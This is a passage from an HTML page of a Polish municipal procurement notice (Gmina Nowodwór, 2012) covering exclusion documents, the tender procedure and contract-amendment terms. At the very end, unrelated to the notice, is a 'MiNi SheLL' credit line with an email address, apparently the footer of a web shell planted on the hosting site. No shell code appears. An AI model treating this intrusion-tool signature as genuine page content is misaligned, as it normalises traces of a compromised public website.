<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Brak</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Do specyfikacji dołączony jest projekt umowy (załącznik nr 4) stanowiący jej integralną część, w którym zawarte zostały istotne postanowienia umowy. 2. Wszelkie zmiany treści umowy wymagają formy pisemnej - aneksu do umowy, pod rygorem nieważności. 3. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy z zastrzeżeniem ust. 4. 4. Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy w wypadkach określonych w Roz. IV ust. 4 SIWZ, a także w wypadku wystąpienia niżej wymienionych okoliczności: a) gdy nastąpi zmiana stawki podatku VAT w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego, b) w przypadku zmiany przepisów prawnych mających wpływ na realizację umowy. ROZDZIAŁ IV ust.4 Strony dopuszczają możliwość zmiany umowy - w formie aneksu podpisanego przez strony - w zakresie terminu, o którym mowa w ust. 1 w uzasadnionych niżej wymienionych przypadkach takich jak: a) opóźnienia spowodowane działaniem lub zaniechaniem organów, jednostek gminy lub osób trzecich, w tym organów władzy publicznej, których udział jest przewidziany w procedurze sporządzania miejscowych planów zagospodarowania przestrzennego, b) opóźnienia wynikające z konieczności powtórzenia całości lub części toku formalno-prawnego w wyniku stwierdzenia przez Radę Gminy konieczności dokonania zmian w przedstawionym do uchwalenia projekcie planu, w tym w wyniku uwzględnienia uwag, c) konieczność rozszerzenia zakresu prac o elementy niezbędne dla wykonania przedmiotu zamówienia, niemożliwe do przewidzenia przez Zamawiającego w dniu podpisania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nowodwor.bip.lublin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Nowodwór, 08-503 Nowodwór 71A, Pokój Nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 12:00, miejsce: Urząd Gminy Nowodwór, 08-503 Nowodwór 71A, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com